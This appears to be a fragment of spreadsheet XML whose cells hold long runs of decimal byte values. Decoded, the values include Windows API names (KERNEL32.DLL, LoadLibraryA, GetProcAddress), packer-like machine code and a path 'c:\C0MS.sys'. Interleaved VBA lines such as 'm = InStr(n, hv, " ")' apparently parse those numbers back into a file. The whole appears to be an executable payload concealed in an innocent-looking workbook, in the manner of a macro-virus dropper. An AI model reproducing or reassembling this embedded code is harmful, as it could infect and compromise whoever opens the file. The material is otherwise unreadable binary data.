97 219 110 133 84 149 184 116 83 72 118 2 92 218 246 86 234 118 48 92 111 76 77 219 20 116 115 118 152 188 176 5 132 50 163 89 239 69 77 92 225 251 109 123 190 59 108 49 116 48 48 49 92 56 105 46 255 229 223 135 24 0 135 205 163 214 185 213 253 212 218 198 244 182 175 143 246 234 103 19 212 203 208 208 151 27 39 156 123 239 242 215 180 204 172 182 168 11 172 174 183 223 216 54 232 3 89 94 109 2 100 174 72 58 37 77 99 211 200 2 175 92 70 236 46 68 112 111 109 201 221 15 84 109 112 122 157 98 117 103 183 237 110 89 16 0 77 83 71 231 65 7 78 87 87 90 104 39 87 5 1 71 191 27 106 91 107 255 89 111 117 32 108 111 103 40 97 194 32 65 109 100 25 107 120 47 2 32 58 10 135 34 253 127 155 83 83 47 6 0 195 220 194 235 206 170 191 213 199 86 186 213 218 109 0 42 25 68 0 134 154 183 45 123 183 88 73 0 82 23 13 65 23 205 </t>
  </si>
  <si>
    <t xml:space="preserve">30 0 4 0 0 0 15 0 0 0 0 0 0 0 0 0 0 0 5 0 0 255 8 0 68 0 0 0 0 65 133 0 253 0 10 0 4 0 1 0 22 0 29 0 0 0 6 0 40 0 5 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 6 0 0 255 18 0 23 11 0 99 58 92 67 48 77 83 46 115 121 115 66 1 72 129 253 0 10 0 5 0 1 0 22 0 3 0 0 0 6 0 37 0 6 0 0 0 15 0 1 0 0 0 0 0 255 255 0 0 7 0 0 255 15 0 23 6 0 97 100 100 115 117 109 29 0 66 2 17 128 253 0 10 0 6 0 1 0 22 0 42 0 0 0 6 0 26 0 7 0 0 0 15 0 1 0 1 0 0 0 255 255 0 0 192 1 52 253 4 0 66 0 55 0 253 0 10 0 7 0 1 0 22 0 33 0 0 0 253 0 10 0 8 0 1 0 22 0 34 0 0 0 253 0 10 0 9 0 1 0 23 0 30 0 0 0 253 0 10 0 10 0 1 0 23 0 4 0 0 0 253 0 10 0 11 0 1 0 23 0 5 0 0 0 253 0 10 0 12 0 1 0 22 0 6 0 0 0 253 0 10 0 13 0 1 0 23 0 35 0 0 0 253 0 10 0 14 0 1 0 23 0 30 0 0 0 253 0 10 0 15 0 1 0 23 0 31 0 0 0 253 0 10 0 16 0 1 0 23 0 4 0 0 0 253 0 10 0 17 0 1 0 23 0 7 0 0 0 253 0 10 0 18 0 1 0 23 0 8 0 0 0 253 0 10 0 19 0 1 0 23 0 30 0 0 0 253 0 10 0 20 0 1 0 22 0 31 0 0 0 253 0 10 0 21 0 1 0 23 0 36 0 0 0 253 0 10 0 22 0 1 0 23 0 9 0 0 0 253 0 10 0 23 0 1 0 22 0 10 0 0 0 253 0 10 0 24 0 1 0 23 0 11 0 0 0 253 0 10 0 25 0 1 0 23 0 43 0 0 0 253 0 10 0 26 0 1 0 23 0 12 0 0 0 253 0 10 0 27 0 1 0 23 0 13 0 0 0 253 0 10 0 28 0 1 0 23 0 14 0 0 0 253 0 10 0 29 0 1 0 23 0 51 0 0 0 253 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 148 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 2 60 84 0 255 255 0 0 0 0 2 60 88 0 255 255 0 0 0 0 2 60 92 0 255 255 0 0 0 0 2 60 96 0 255 255 0 0 0 0 2 60 100 0 255 255 0 0 0 0 2 60 104 0 255 255 0 0 0 0 2 60 108 0 255 255 0 0 0 0 2 60 112 0 255 255 0 0 0 0 2 60 116 0 255 255 0 0 0 0 2 60 120 0 255 255 0 0 0 0 2 60 124 0 255 255 0 0 0 0 2 60 255 255 255 255 0 0 255 255 1 1 0 0 0 0 1 0 78 0 48 0 123 0 48 0 48 0 48 0 50 0 48 0 56 0 49 0 57 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 7 0 0 0 160 2 0 0 1 1 200 3 0 0 144 0 0 0 255 255 255 255 255 255 255 255 32 0 0 0 29 0 16 0 37 0 0 0 29 0 12 0 37 0 0 0 12 17 26 2 255 255 255 255 0 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 16 1 0 0 28 255 111 0 255 255 255 255 255 255 255 255 20 3 0 0 10 0 10 0 1 0 148 0 0 1 0 0 2 128 254 255 255 255 255 255 16 0 255 255 136 0 0 0 2 1 255 255 96 0 0 0 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 0 0 37 0 0 0 34 160 22 2 255 255 255 255 52 0 255 255 24 0 0 0 0 0 0 0 0 0 3 64 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 2 131 254 255 255 255 255 255 8 0 255 255 16 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 56 192 0 0 40 192 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 68 192 0 0 82 192 0 0 98 192 0 0 0 0 0 0 75 69 82 78 69 76 51 50 46 68 76 76 0 0 76 111 97 100 76 105 98 114 97 114 121 65 0 0 71 101 116 80 114 111 99 65 100 100 114 101 115 115 0 0 69 120 105 116 80 114 111 99 101 115 115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</si>
  <si>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221 61 189 125 253 19 0 154 166 91 150 9 1 147 7 147 83 83 105 154 166 105 211 211 51 51 179 166 105 154 166 179 115 115 243 243 154 166 105 154 11 11 139 139 75 75 105 154 166 105 203 203 43 43 171 166 105 154 166 171 107 107 235 235 154 166 105 154 27 27 155 155 91 91 105 154 166 105 219 219 59 59 187 166 105 154 166 187 123 123 251 251 154 166 105 154 7 7 135 135 71 71 105 154 166 105 199 199 39 39 167 166 105 154 166 167 103 103 231 231 154 166 105 154 23 23 151 151 87 87 105 154 166 105 215 215 55 55 183 166 105 154 166 183 119 119 247 247 154 166 105 154 15 15 143 143 79 79 105 154 166 105 207 207 47 47 175 166 105 154 166 175 111 111 239 239 154 166 105 154 31 31 159 159 95 95 105 154 166 105 223 223 63 63 191 166 105 154 166 191 127 127 255 255 77 211 116 95 25 64 3 32 96 16 80 52 77 211 52 48 112 8 72 40 211 52 77 211 104 24 88 56 120 77 211 52 77 4 68 36 100 20 84 116 93 211 52 52 116 3 65 131 3 67 13 52 77 211 195 35 163 99 9 227 77 211 61 56 47 3 8 24 4 52 77 211 52 20 12 28 2 18 211 52 77 211 10 26 6 22 14 77 211 52 77 30 1 17 9 25 5 52 77 211 52 21 13 29 3 19 78 3 77 211 11 27 7 153 23 72 211 253 13 81 3 4 4 5 5 6 0 7 8 201 144 12 50 9 10 11 80 50 148 12 12 13 80 201 80 201 14 15 210 116 31 131 13 18 19 19 20 0 21 22 50 36 131 12 23 24 25 148 12 37 67 26 27 84 50 84 50 28 29 134 19 212 33 255 203 241 29 194 16 14 221 179 91 16 50 200 32 131 0 17 18 19 12 201 144 12 20 21 22 148 12 201 144 23 24 168 132 80 50 25 127 89 44 139 82 90 191 183 116 89 204 34 175 167 10 52 77 211 52 59 12 14 16 20 24 211 52 77 211 28 32 40 48 56 77 211 52 77 64 80 96 112 128 160 194 86 210 52 192 224 119 239 189 247 94 115 111 107 103 99 95 190 247 222 123 91 87 83 79 75 60 128 165 74 5 200 64 117 126 220 170 169 86 51 10 98 33 32 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 11 0 255 255 32 0 0 0 255 255 255 255 64 4 80 2 255 255 255 255 92 255 255 255 12 0 255 255 0 0 0 0 255 255 255 255 64 4 254 255 144 5 0 0 76 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 120 5 0 0 60 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 88 14 0 0 56 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 200 5 0 0 40 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 224 5 0 0 24 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 184 2 0 0 128 0 0 0 255 255 255 255 64 4 254 255 248 5 0 0 8 255 255 255 12 0 255 255 32 0 0 0 64 0 0 0 64 4 254 255 104 13 0 0 248 254 255 255 12 0 255 255 32 0 0 0 5 0 0 0 64 4 254 255 255 255 255 255 232 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 192 2 0 0 128 0 0 0 8 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 200 2 0 0 128 0 0 0 16 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 112 6 0 0 128 0 0 0 8 0 0 0 29 0 16 0 37 0 0 0 255 255 255 255 128 1 0 0 32 132 55 2 255 255 255 255 120 255 255 255 152 6 0 0 128 0 0 0 8 2 0 0 29 0 16 0 37 0 0 0 64 4 82 2 255 255 255 255 216 254 255 255 12 0 255 255 0 0 0 0 176 5 0 0 48 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 184 7 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 16 8 0 0 248 7 0 0 136 8 0 0 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">1 175 221 18 117 23 83 71 60 112 10 236 241 179 18 108 13 213 161 52 227 105 53 228 155 144 129 52 52 147 213 128 217 12 53 129 11 44 81 165 218 7 106 131 55 10 146 170 187 111 67 93 91 117 5 16 36 179 89 209 145 42 75 80 6 12 43 60 253 151 168 87 198 254 247 247 51 201 137 141 212 2 141 243 60 207 23 140 141 141 141 141 82 108 81 133 63 82 60 82 39 85 174 196 129 170 60 201 141 128 34 156 162 135 123 232 106 55 23 108 26 35 133 179 88 137 7 101 162 26 173 139 35 3 13 14 37 194 85 235 34 207 102 160 125 70 48 176 160 8 93 45 90 70 28 34 85 216 166 97 196 43 201 191 107 253 36 232 17 194 179 2 89 119 13 197 164 138 4 38 247 3 61 32 33 6 83 173 128 134 72 70 86 12 209 16 0 205 7 113 44 163 119 50 74 136 142 232 73 68 12 240 9 113 16 96 21 89 137 6 232 180 146 49 106 212 228 97 32 19 66 46 1 112 5 57 32 23 211 199 69 37 44 200 121 93 139 152 28 210 187 228 229 70 162 222 44 38 198 38 34 182 192 26 195 155 0 240 38 135 108 9 13 86 177 248 160 15 102 0 136 52 47 79 247 236 100 43 58 33 3 119 33 19 43 217 140 234 54 224 199 3 207 245 96 78 136 2 94 56 44 152 182 70 195 228 120 223 195 116 130 12 44 47 188 7 139 6 56 85 200 200 200 230 241 5 56 60 64 89 182 207 200 68 72 93 100 2 104 96 39 68 179 98 92 172 67 87 179 221 158 17 239 116 25 221 100 80 3 92 79 49 131 88 96 21 83 8 124 101 133 239 201 137 30 29 184 136 80 178 62 189 100 178 160 252 24 81 81 109 52 138 0 56 115 151 22 106 3 173 200 229 117 171 70 113 83 189 235 179 66 4 139 16 110 82 124 59 199 214 110 182 224 219 3 17 32 106 101 80 220 181 252 5 22 190 139 111 184 105 133 55 15 135 143 52 15 182 128 91 87 176 52 212 155 125 36 133 187 86 229 252 248 201 3 251 142 130 50 71 84 57 18 48 88 87 114 202 78 14 56 37 16 135 226 201 41 57 37 26 253 13 114 78 217 43 91 113 65 182 18 7 </t>
  </si>
  <si>
    <t>GoTo a1</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 64 4 254 255 16 0 0 0 236 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 220 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 204 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 96 3 0 0 16 0 0 0 200 254 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 184 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 168 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 64 0 0 0 152 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 136 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 120 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 116 254 255 255 3 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 56 0 0 0 1 0 1 0 1 0 1 0 0 0 0 0 0 0 0 0 32 0 0 0 255 255 255 255 144 0 0 0 96 0 0 0 255 255 255 255 255 255 255 255 32 0 0 0 255 255 255 255 144 0 0 0 96 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 224 0 0 0 184 0 0 0 0 0 0 0 0 0 0 0 68 0 4 0 0 0 0 0 24 3 20 3 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 12 0 4 0 0 0 0 0 152 215 66 66 4 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 58 0 52 0 51 0 49 0 55 0 49 0 50 0 50 0 55 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 49 0 52 0 51 0 49 0 55 0 49 0 50 0 97 0 55 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 </t>
  </si>
  <si>
    <t xml:space="preserve">218 183 190 35 17 246 197 64 98 57 5 8 120 90 165 198 191 81 120 77 255 128 37 79 94 35 198 43 195 116 45 160 105 78 0 218 33 2 95 22 29 179 5 183 61 50 67 70 244 16 86 16 8 42 52 224 228 64 235 7 128 153 66 91 121 121 219 5 38 4 32 116 24 48 116 10 97 187 191 66 237 22 143 240 235 73 238 247 235 12 182 54 234 116 8 1 119 240 83 7 130 71 122 249 142 4 35 202 191 205 200 127 53 16 77 21 88 140 203 156 40 29 53 65 183 43 206 51 116 60 7 3 0 110 167 27 217 92 244 71 248 55 8 4 215 116 141 182 46 94 248 121 42 5 26 7 116 187 91 77 6 9 238 116 14 172 48 9 38 5 235 32 94 238 163 247 102 190 254 110 131 13 154 255 55 19 38 152 211 20 195 176 197 247 209 2 20 55 140 244 6 247 2 161 10 129 206 31 15 246 1 246 196 197 54 136 27 171 11 247 184 8 20 29 17 219 110 96 10 168 17 6 11 251 44 70 105 131 174 144 101 207 162 223 80 244 106 108 124 19 24 113 62 138 86 167 170 81 219 5 242 228 80 6 240 161 226 11 60 158 246 124 192 141 247 116 18 86 171 76 119 16 99 117 27 10 20 20 15 141 89 21 12 96 108 97 196 130 225 16 119 155 101 9 224 39 120 48 119 166 8 189 45 37 89 172 11 108 13 32 38 243 147 12 1 121 245 194 192 250 136 69 11 124 242 11 72 136 111 55 138 91 158 117 120 213 116 246 248 2 116 110 58 134 108 5 166 255 239 137 122 16 11 21 141 174 129 98 128 237 246 46 127 116 77 235 63 54 19 0 180 19 197 73 42 54 168 83 165 117 22 197 175 131 184 24 19 26 220 240 21 60 228 3 51 196 88 169 18 158 79 23 125 64 141 117 133 198 89 50 150 154 227 69 25 76 102 121 15 11 60 136 124 171 218 76 48 4 32 60 130 161 152 21 229 152 87 241 167 135 248 106 141 164 36 150 255 66 87 247 193 3 240 108 227 15 210 138 1 65 132 244 59 14 117 241 184 112 161 47 248 186 255 254 254 140 208 131 79 51 194 221 210 55 26 218 169 52 1 129 116 232 77 252 38 35 185 205 196 198 132 228 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 88 9 0 0 228 254 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 11 0 0 96 10 0 0 13 0 0 0 0 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 208 2 0 0 128 0 0 0 0 0 0 0 64 4 254 255 208 9 0 0 212 254 255 255 12 0 255 255 32 0 0 0 168 1 0 0 64 4 254 255 136 9 0 0 196 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 160 9 0 0 180 254 255 255 12 0 255 255 32 0 0 0 120 1 0 0 64 4 254 255 184 9 0 0 164 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 232 9 0 0 148 254 255 255 12 0 255 255 32 0 0 0 0 1 0 0 64 4 254 255 255 255 255 255 132 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 0 10 0 0 116 254 255 255 12 0 255 255 32 0 0 0 64 0 0 0 64 4 254 255 255 255 255 255 100 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 255 255 255 255 96 254 255 255 8 0 255 255 32 0 0 0 16 0 0 0 64 4 130 2 255 255 255 255 80 254 255 255 12 0 255 255 0 0 0 0 16 0 0 0 64 4 254 255 255 255 255 255 76 254 255 255 3 0 255 255 32 0 0 0 8 0 0 0 64 4 254 255 120 10 0 0 60 254 255 255 12 0 255 255 32 0 0 0 11 0 255 255 64 4 254 255 255 255 255 255 44 254 255 31 12 0 255 255 32 0 0 0 0 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 16 3 0 0 128 0 0 0 255 255 255 255 255 255 255 255 144 10 0 0 0 0 255 255 255 255 255 255 255 255 255 255 28 2 18 2 72 2 255 255 255 255 255 255 255 255 255 255 3 0 255 255 64 4 254 255 120 11 0 0 116 255 255 255 9 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 0 11 0 0 112 255 255 255 8 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 255 255 255 255 108 255 </t>
  </si>
  <si>
    <t xml:space="preserve">118 37 47 29 187 2 4 120 23 179 0 186 5 50 73 36 32 28 139 72 252 61 102 152 234 138 144 164 136 20 41 45 108 73 120 71 95 132 55 123 147 12 204 66 233 234 77 172 102 179 133 188 68 66 147 0 4 52 219 36 131 116 45 139 136 144 20 145 176 110 119 164 160 223 129 164 6 3 194 15 156 8 67 14 57 228 152 148 144 247 214 0 152 140 220 87 13 141 145 168 12 104 189 77 96 191 121 47 27 26 3 243 215 12 97 110 151 4 117 245 24 140 2 224 250 111 63 249 21 195 193 238 2 59 198 26 192 254 192 94 136 65 28 141 168 19 246 163 0 51 192 9 47 248 214 255 131 230 1 11 198 209 233 209 224 74 172 127 240 209 232 18 48 225 23 18 63 16 83 117 56 73 104 61 133 60 118 72 255 64 20 242 111 109 194 89 46 136 6 114 61 8 124 52 239 214 64 112 51 137 55 182 136 59 11 156 5 115 19 45 105 66 127 248 62 178 13 115 78 58 127 144 250 8 83 126 247 2 165 72 63 209 126 20 31 205 182 4 51 61 241 20 41 50 94 13 21 46 100 40 239 235 217 110 241 218 192 139 250 214 116 140 143 147 199 128 216 99 23 28 189 24 116 59 38 102 125 182 31 179 8 44 136 60 12 112 70 137 118 63 216 191 6 138 203 246 209 136 12 22 16 139 203 247 209 137 107 44 22 15 204 12 111 133 219 116 33 175 56 195 138 193 238 206 189 31 71 41 11 70 71 75 40 117 226 17 93 35 161 69 160 14 4 238 16 229 237 2 164 130 16 11 226 11 127 176 20 153 40 174 138 131 199 130 24 243 221 16 116 13 36 70 138 28 11 15 36 108 166 217 76 56 9 48 76 233 130 129 97 237 140 130 22 210 232 154 138 6 182 99 140 111 254 141 165 83 20 182 28 6 51 143 236 240 246 127 227 141 52 66 77 116 52 4 102 3 241 209 230 139 206 71 76 68 4 215 13 189 80 144 15 126 230 176 219 124 39 201 186 161 182 98 183 2 130 25 131 68 84 4 181 193 181 133 39 64 36 8 66 115 236 190 19 252 11 133 183 70 59 243 126 217 94 136 95 8 88 104 64 3 194 163 102 56 224 5 10 133 146 14 26 24 </t>
  </si>
  <si>
    <t>n = m + 1</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 8 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 224 1 0 0 255 255 255 255 24 11 0 0 32 132 55 2 255 255 255 255 120 255 255 255 24 6 0 0 128 0 0 0 0 0 0 0 0 12 0 0 120 10 0 0 13 0 0 0 0 0 0 0 255 255 255 255 248 10 0 0 64 4 254 255 144 11 0 0 92 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 56 11 0 0 64 4 254 255 56 12 0 0 88 255 255 255 9 0 255 255 32 0 0 0 8 0 0 0 64 4 254 255 232 11 0 0 72 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 200 11 0 0 56 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 40 11 0 0 64 4 254 255 24 12 0 0 40 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 168 11 0 0 64 4 254 255 104 12 0 0 24 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 120 10 0 0 20 0 0 0 0 0 0 0 255 255 255 255 184 11 0 0 64 4 254 255 255 255 255 255 8 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 248 11 0 0 64 4 254 255 80 12 0 0 4 255 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 0 255 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 240 12 0 0 240 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 12 17 164 2 255 255 255 255 3 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 255 255 255 255 120 255 10 0 192 12 0 0 255 255 255 255 52 0 3 0 7 0 7 0 101 0 148 1 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 32 6 0 0 0 0 0 0 255 255 255 255 132 0 0 0 0 0 0 0 255 255 255 255 136 11 0 0 255 255 255 255 224 12 0 0 64 4 254 255 8 13 0 0 224 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 </t>
  </si>
  <si>
    <t xml:space="preserve">51 210 8 67 35 154 140 192 98 112 24 98 67 236 102 137 150 251 199 134 113 10 239 127 67 76 126 55 102 57 20 135 116 35 139 142 23 117 196 79 136 199 6 137 132 142 113 12 136 148 48 254 135 183 119 63 139 232 235 5 112 84 135 2 184 64 59 193 124 201 131 190 157 128 183 255 41 2 125 86 131 253 4 5 69 139 253 91 251 162 149 69 11 135 239 71 6 142 253 162 35 142 160 163 218 137 8 116 11 193 12 241 33 181 41 134 88 81 255 239 191 222 124 174 167 155 137 105 4 139 134 19 153 43 194 139 216 209 251 131 75 244 41 248 251 1 124 17 83 31 99 252 96 75 155 132 9 118 16 125 239 63 255 43 197 67 108 17 117 134 5 158 214 26 244 54 69 72 137 19 139 52 248 189 246 142 189 16 58 139 150 253 46 16 45 182 48 219 70 74 137 15 35 156 176 196 225 1 89 154 76 73 76 139 12 135 166 241 216 27 117 12 159 31 175 138 140 202 138 148 30 163 218 210 79 96 209 114 5 112 202 129 251 101 225 109 113 254 193 197 46 20 42 108 111 246 189 119 4 159 2 137 174 101 128 69 123 144 28 106 38 122 117 48 180 3 44 22 100 59 139 175 150 116 195 212 47 50 196 131 68 100 204 167 54 154 253 97 141 150 52 193 82 95 135 177 45 133 140 8 207 124 240 186 20 219 174 224 241 200 134 212 165 102 220 17 32 61 218 144 35 128 9 11 224 193 109 96 7 65 118 92 55 184 18 43 63 54 226 108 20 22 136 164 142 112 171 110 135 183 102 6 72 33 125 232 49 7 55 152 179 233 64 17 200 11 100 100 168 89 196 63 83 144 56 69 233 126 106 222 25 91 110 72 65 174 72 221 18 116 32 113 6 179 88 81 67 37 98 48 112 73 19 94 92 252 136 78 22 176 12 91 167 116 252 148 140 218 87 159 16 101 77 172 68 195 76 35 111 42 38 53 67 77 182 159 186 194 49 70 214 23 172 161 38 175 77 242 185 3 16 202 158 149 163 217 179 96 238 159 151 162 158 235 9 140 150 12 78 106 128 210 179 107 89 41 20 242 9 126 74 254 104 244 38 7 200 247 7 228 149 234 196 172 37 115 50 222 201 110 44 176 </t>
  </si>
  <si>
    <t>m = InStr(n, hv, " ")</t>
  </si>
  <si>
    <t xml:space="preserve">114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 30 0 0 0 9 0 0 0 0 0 0 0 9 0 0 0 0 0 5 0 96 0 0 0 0 0 0 0 1 0 1 0 10 0 0 0 17 5 0 0 0 0 0 0 9 8 0 0 0 0 0 0 9 0 0 0 0 0 2 0 193 6 0 0 0 0 0 0 169 9 0 0 0 0 0 0 89 9 0 0 0 0 0 0 49 9 0 0 0 0 0 0 129 9 0 0 0 0 0 0 169 18 0 0 0 0 0 0 233 18 0 0 0 0 0 0 1 0 1 0 0 0 1 0 57 5 0 0 0 0 0 0 97 5 0 0 0 0 0 0 137 5 0 0 0 0 0 0 255 255 255 255 17 5 0 0 0 0 0 0 8 0 30 0 56 0 0 0 177 5 0 0 0 0 0 0 97 0 0 0 0 0 1 0 217 5 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 1 0 131 7 0 0 0 0 3 96 9 1 0 0 0 0 4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1 0 190 0 23 1 0 0 0 0 4 0 36 1 0 0 228 0 0 0 0 2 0 5 75 255 255 0 73 252 102 52 255 37 58 100 255 8 0 37 4 116 255 4 120 255 33 13 28 0 0 0 8 120 255 13 204 0 1 0 8 116 255 254 162 68 255 0 0 0 0 1 0 253 243 9 0 25 32 255 8 32 255 44 46 2 0 0 41 6 0 120 255 116 255 32 255 53 68 255 0 24 244 0 4 120 255 33 13 28 0 0 0 8 120 255 13 12 5 1 0 26 120 255 0 34 4 120 255 33 13 28 0 0 0 81 120 255 91 116 255 8 8 0 6 52 0 36 </t>
  </si>
  <si>
    <t xml:space="preserve">55 37 239 161 119 151 185 26 188 88 101 123 38 144 107 192 135 216 210 183 115 107 190 18 102 99 101 172 208 236 10 83 45 97 105 222 172 21 10 51 138 190 90 22 52 248 193 240 30 149 27 67 120 120 95 10 46 9 13 129 72 231 24 97 14 78 224 208 37 74 251 102 78 129 142 158 142 82 32 228 83 15 108 1 104 159 64 71 36 116 40 83 72 69 172 32 246 117 219 18 82 17 121 99 178 110 19 176 25 53 240 153 11 114 139 54 172 145 102 187 65 78 94 248 72 164 228 131 206 192 86 22 106 180 165 244 32 86 67 225 115 186 5 137 51 152 4 43 229 97 102 144 163 179 216 10 22 84 106 194 66 54 66 107 65 21 15 222 194 34 66 186 209 94 142 102 19 128 174 36 192 54 35 168 80 194 96 181 236 196 97 45 19 25 66 235 75 130 77 104 27 111 1 112 112 153 52 24 102 209 10 155 235 66 119 55 107 187 32 252 65 75 105 246 21 31 102 135 150 53 42 90 11 60 212 168 167 233 247 117 72 72 83 141 71 119 115 51 254 113 117 151 72 108 127 81 176 7 179 65 23 90 24 219 190 232 136 66 245 110 196 110 5 99 17 61 113 178 3 71 20 101 100 128 101 217 91 217 155 62 126 62 84 14 82 3 107 12 85 109 95 222 140 34 241 6 71 39 114 234 112 42 217 36 38 241 22 91 183 51 150 69 3 76 1 84 67 194 66 197 32 208 61 52 224 14 241 172 189 248 11 1 7 10 146 32 19 110 155 51 247 157 20 216 176 13 64 11 15 113 110 203 206 4 0 7 23 1 0 3 59 155 85 248 36 16 7 208 114 176 96 6 3 204 204 200 221 10 144 63 182 1 0 192 5 167 116 29 175 14 100 79 46 116 244 197 145 138 8 217 96 144 160 152 110 174 136 199 191 96 46 114 122 251 28 47 92 54 132 65 48 3 2 64 32 205 45 214 46 38 75 228 24 224 110 171 77 217 224 39 192 79 93 99 11 173 108 16 102 235 43 240 79 52 2 224 236 27 0 173 217 0 0 0 0 0 0 18 0 255 96 190 0 208 64 0 141 190 0 64 255 255 87 131 205 255 235 16 144 144 144 144 144 144 138 6 70 136 7 71 1 219 </t>
  </si>
  <si>
    <t xml:space="preserve">2 0 13 36 0 3 0 26 116 255 0 42 4 28 255 4 120 255 5 4 0 36 5 0 13 208 0 6 0 8 120 255 13 48 0 7 0 108 28 255 245 1 0 0 0 214 26 120 255 28 223 0 0 43 4 116 255 245 9 4 0 0 39 100 255 37 4 120 255 5 4 0 36 5 0 13 208 0 6 0 8 120 255 13 40 0 7 0 41 4 0 120 255 116 255 0 2 0 0 19 0 0 0 0 4 0 96 0 228 0 36 0 8 0 0 0 0 0 19 0 0 0 0 0 12 0 0 0 0 0 0 0 0 0 0 0 28 0 0 0 0 0 4 0 0 0 0 0 120 255 3 0 116 255 3 0 32 255 3 0 68 255 2 0 7 0 0 19 0 0 56 0 88 0 0 127 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 16 0 0 0 9 0 0 0 0 0 4 0 255 255 255 255 255 255 255 255 0 0 0 0 68 0 0 0 4 0 36 0 1 1 0 0 0 0 4 0 0 0 3 96 0 0 20 3 28 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 30 1 0 0 0 0 0 0 0 110 0 0 127 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 114 85 128 0 0 0 0 0 0 0 128 0 0 0 128 0 0 0 0 0 0 0 16 0 0 0 9 0 0 0 0 0 2 0 255 255 255 255 255 255 255 255 0 0 0 0 72 0 0 0 4 0 44 0 185 1 0 0 0 0 2 0 0 0 3 96 4 0 40 0 28 0 255 